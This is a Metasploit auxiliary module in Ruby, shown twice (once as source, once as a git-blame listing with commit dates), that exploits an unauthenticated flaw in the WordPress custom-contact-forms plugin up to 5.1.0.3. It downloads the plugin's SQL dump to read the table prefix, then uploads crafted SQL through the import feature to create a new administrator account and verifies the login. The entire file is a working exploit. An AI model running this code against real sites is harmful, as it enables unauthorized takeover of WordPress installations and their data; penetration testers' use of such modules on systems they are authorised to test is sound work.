modules/auxiliary/admin/http/wp_custom_contact_forms.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress custom-contact-forms Plugin SQL Upload',
        'Description' => %q{
          The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download
          a SQL dump of the plugins database tables. It's also possible to upload files containing
          SQL statements which will be executed. The module first tries to extract the WordPress
          table prefix from the dump and then attempts to create a new admin user.
        },
        'Author' => [
          'Marc-Alexandre Montpas', # Vulnerability discovery
          'Christian Mehlmauer' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],
          [ 'WPVDB', '7542' ]
        ],
        'DisclosureDate' => '2014-08-07'
      )
    )
  end

  def get_sql(table_prefix, username, password)
    # create user
    sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');"
    # make user administrator
    sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');"

    sql
  end

  def get_table_prefix
    res = send_request_cgi({
      'uri' => wordpress_url_admin_post,
      'method' => 'POST',
      'vars_post' => {
        'ccf_export' => '1'
      }
    })
    return nil if res.nil? || res.code != 302 || res.headers['Location'] !~ /\.sql$/

    file = res.headers['Location']
    res_file = send_request_cgi('uri' => file)
    return nil if res_file.nil? || res_file.code != 200 || res_file.body.nil?

    match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i)
    return nil if match.nil? || match.length < 2

    table_prefix = match[1]
    table_prefix
  end

  def run
    username = Rex::Text.rand_text_alpha(10)
    password = Rex::Text.rand_text_alpha(20)

    print_status('Trying to get table_prefix')
    table_prefix = get_table_prefix
    if table_prefix.nil?
      print_error('Unable to get table_prefix')
      return
    else
      print_status("got table_prefix '#{table_prefix}'")
    end

    data = Rex::MIME::Message.new
    data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, "form-data; name=\"import_file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.sql\"")
    data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"')
    post_data = data.to_s

    print_status("Inserting user #{username} with password #{password}")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => wordpress_url_admin_post,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    )

    if res.nil? || res.code != 302 || res.headers['Location'] != 'options-general.php?page=custom-contact-forms'
      fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # test login
    cookie = wordpress_login(username, password)

    # login successful
    if cookie
      print_good("User #{username} with password #{password} successfully created")
      store_valid_credential(user: username, private: password, proof: cookie)
    else
      print_error('User creation failed')
      return
    end
  end
end
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`include Msf::Auxiliary::Report`
Update moduels using Msf::HTTP::Wordpress 2015-10-15 11:47:13 -05:00			`include Msf::Exploit::Remote::HTTP::Wordpress`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00
			`def initialize(info = {})`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'WordPress custom-contact-forms Plugin SQL Upload',`
			`'Description' => %q{`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download`
			`a SQL dump of the plugins database tables. It's also possible to upload files containing`
Release fixes, all titles and descs 2014-10-01 14:26:09 -05:00			`SQL statements which will be executed. The module first tries to extract the WordPress`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`table prefix from the dump and then attempts to create a new admin user.`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`},`
			`'Author' => [`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`'Marc-Alexandre Montpas', # Vulnerability discovery`
			`'Christian Mehlmauer' # Metasploit module`
			`],`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`[ 'URL', 'http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html' ],`
Added wpvulndb links 2014-10-02 23:03:31 +02:00			`[ 'URL', 'https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=' ],`
change WPVULNDBID to WPVDB 2014-10-03 17:13:18 +02:00			`[ 'WPVDB', '7542' ]`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`],`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'DisclosureDate' => '2014-08-07'`
			`)`
			`)`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`end`

			`def get_sql(table_prefix, username, password)`
			`# create user`
			`sql = "INSERT INTO #{table_prefix}users (user_login, user_pass) VALUES ('#{username}','#{Rex::Text.md5(password)}');"`
			`# make user administrator`
fix bug 2014-09-30 00:21:52 +02:00			`sql << "INSERT INTO #{table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}capabilities','a:1:{s:13:\"administrator\";b:1;}'),((select id from #{table_prefix}users where user_login='#{username}'),'#{table_prefix}user_level','10');"`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00
			`sql`
			`end`

			`def get_table_prefix`
			`res = send_request_cgi({`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'uri' => wordpress_url_admin_post,`
			`'method' => 'POST',`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`'vars_post' => {`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'ccf_export' => '1'`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`}`
			`})`
			`return nil if res.nil? \|\| res.code != 302 \|\| res.headers['Location'] !~ /\.sql$/`

			`file = res.headers['Location']`
			`res_file = send_request_cgi('uri' => file)`
			`return nil if res_file.nil? \|\| res_file.code != 200 \|\| res_file.body.nil?`

			match = res_file.body.match(/insert into `(.+_)customcontactforms_fields`/i)
bugfix 2014-09-27 14:56:34 +02:00			`return nil if match.nil? \|\| match.length < 2`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00
			`table_prefix = match[1]`
			`table_prefix`
			`end`

			`def run`
			`username = Rex::Text.rand_text_alpha(10)`
			`password = Rex::Text.rand_text_alpha(20)`

Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`print_status('Trying to get table_prefix')`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`table_prefix = get_table_prefix`
			`if table_prefix.nil?`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`print_error('Unable to get table_prefix')`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`return`
			`else`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("got table_prefix '#{table_prefix}'")`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`end`

			`data = Rex::MIME::Message.new`
			`data.add_part(get_sql(table_prefix, username, password), 'text/plain', nil, "form-data; name=\"import_file\"; filename=\"#{Rex::Text.rand_text_alpha(5)}.sql\"")`
			`data.add_part('1', nil, nil, 'form-data; name="ccf_merge_import"')`
			`post_data = data.to_s`

Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Inserting user #{username} with password #{password}")`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`res = send_request_cgi(`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`'method' => 'POST',`
			`'uri' => wordpress_url_admin_post,`
			`'ctype' => "multipart/form-data; boundary=#{data.bound}",`
			`'data' => post_data`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`)`

			`if res.nil? \|\| res.code != 302 \|\| res.headers['Location'] != 'options-general.php?page=custom-contact-forms'`
			`fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")`
			`end`

			`# test login`
			`cookie = wordpress_login(username, password)`

simplify valid credential storage 2017-05-01 15:52:53 -05:00			`# login successful`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`if cookie`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_good("User #{username} with password #{password} successfully created")`
convert store_valid_credential to named params 2017-05-05 18:23:15 -05:00			`store_valid_credential(user: username, private: password, proof: cookie)`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`else`
Run rubocop on auxiliary admin http modules 2023-02-08 14:30:08 +00:00			`print_error('User creation failed')`
Added WordPress custom_contact_forms module 2014-09-27 13:42:49 +02:00			`return`
			`end`
			`end`
			`end`